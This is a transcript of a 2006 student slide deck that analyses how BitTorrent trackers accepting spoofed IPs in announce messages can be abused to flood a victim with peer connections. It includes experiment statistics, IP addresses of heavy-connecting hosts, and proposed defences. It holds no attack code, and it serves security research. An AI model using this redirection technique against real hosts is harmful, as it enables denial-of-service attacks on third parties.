DDoS Vulnerability Analysis of BitTorrent Protocol

Download Report

Transcript DDoS Vulnerability Analysis of BitTorrent Protocol

DDoS Vulnerability Analysis
of BitTorrent Protocol
CS239 project
Spring 2006
Background

BitTorrent (BT)




P2P file sharing protocol
30% of Internet traffic
6881- top 10 scanned port in the Internet
DDoS



Distributed – hard to guard against by simply
filtering at upstream routers
Application level (resources)
Network level (bandwidth)
How BT works




.torrent file (meta-data)
 Information of files being shared
 Hashes of pieces of files
Trackers (coordinator)
 http, udp trackers
 Trackerless (DHT)
BT clients (participants)
 Azureus
 BitComet
 uTorrent
 etc.
Online forum (exchange medium)
 For user to announce and search for .torrent files
Communication with trackers
seeder
.torrent
I have the file!
Who has the file?
Tracker
clients
Discussion
forum
Who has the file?
.torrent
client
Message exchange

HTTP/UDP tracker



Get peer + announce combined (who is sharing files)
Scrapping (information lookup)
DHT (trackerless)




Ping/response (announcing participation in DHT network)
Find node (location peers in DHT network)
Get peer (locate who is sharing files)
Announce (announce who is sharing files)
Vulnerabilities

Spoofed information



* Both http and udp trackers allow specified IP in announce
DHT does not allow specified IP in announce
 Allow spoofed information on who is participating in DHT
network
 Possible to redirect a lot of DHT query to a victim
Compromised tracker
Attack illustration
victim
Who has the files?
Tracker
clients
Discussion
forum
.torrent
.torrent
.torrent
.torrent
.torrent
.torrent
Victim has the files!
attacker
Experiments

Discussion forum (http://www.mininova.org)
 1191 newly uploaded .torrent files in 2 days

Victim (131.179.187.205)
 Apache web server (configured to serve 400 clients)
 tcpdump, netstat

Attacker
 Python script to process .torrent files and contact trackers

Zombies
 Computers running BitTorrent clients in the Internet
Statistics
Torrents
Total
1191
Corrupted
6
Single tracker
999
Multiple trackers
186
Support DHT
121
Trackers
http trackers
1963
udp trackers
85
Unique http trackers
311
Unique udp trackers
21
Measurements (1)

Attacker


1191 torrent files used
30 concurrent threads, contact trackers once
Measurements (2)

Attacker
 1191 torrent files used
 40 concurrent threads, contact trackers 10 times
 Attack ends after 8 hours
Measurements (3)


30513 distinct IPs recorded
Number of connection attempts per host

Retry 3,6,9,… seems a common implementation
Measurement (abnormal behavior)
o
Top 15 hosts with highest number of connection attempts
o
o
o
o
o
o
o
o
o
o
o
o
o
o
o
o
o
8995
8762
1953
1841
1273
1233
1183
1171
1167
1053
1042
896
861
855
753
202.156.6.67
24.22.183.141
71.83.213.106
24.5.44.13
147.197.200.44
82.40.167.116
194.144.130.220
82.33.194.6
219.78.137.197
83.146.39.94
82.10.187.190
65.93.12.152
84.231.86.223
24.199.85.75
207.210.96.205
Content pollution agents?
Other researchers?
Country: SINGAPORE (SG)
Country: UNITED STATES (US)
Country: (Unknown Country?) (XX)
Country: UNITED STATES (US)
Country: UNITED KINGDOM (UK)
Country: UNITED KINGDOM (UK)
Country: ICELAND (IS)
Country: UNITED KINGDOM (UK)
Country: HONG KONG (HK)
Country: UNITED KINGDOM (UK)
Country: UNITED KINGDOM (UK)
Country: CANADA (CA)
Country: FINLAND (FI)
Country: UNITED STATES (US)
Country: CANADA (CA)
Top 15 countries















United States
Canada
United Kingdom
Germany
France
Spain
Australia
Sweden
Netherlands
Malaysia
Norway
Poland
Japan
Brazil
China
Countries with less BT clients running
















Albania
Bermuda
Bolivia
Georgia
Ghana
Kenya
Lao
Lebanon
Monaco
Mongolia
Nicaragua
Nigeria
Qatar
Tanzania
Uganda
Zimbabwe
Solution

Better tracker implementation

Authentication with trackers


Similar to the one used in DHT
Filtering packets by analyzing the protocol

e.g. check [SYN|ACK|80] incoming packets for legitimate
HTTP header
End
Q and A
seeder
.torrent
I have the file!
Tracker
Discussion
forum
Who has the file?
.torrent
client
victim
Who has the files?
Tracker
clients
Discussion
forum
.torrent
.torrent
.torrent
.torrent
.torrent
.torrent
Victim has the files!
attacker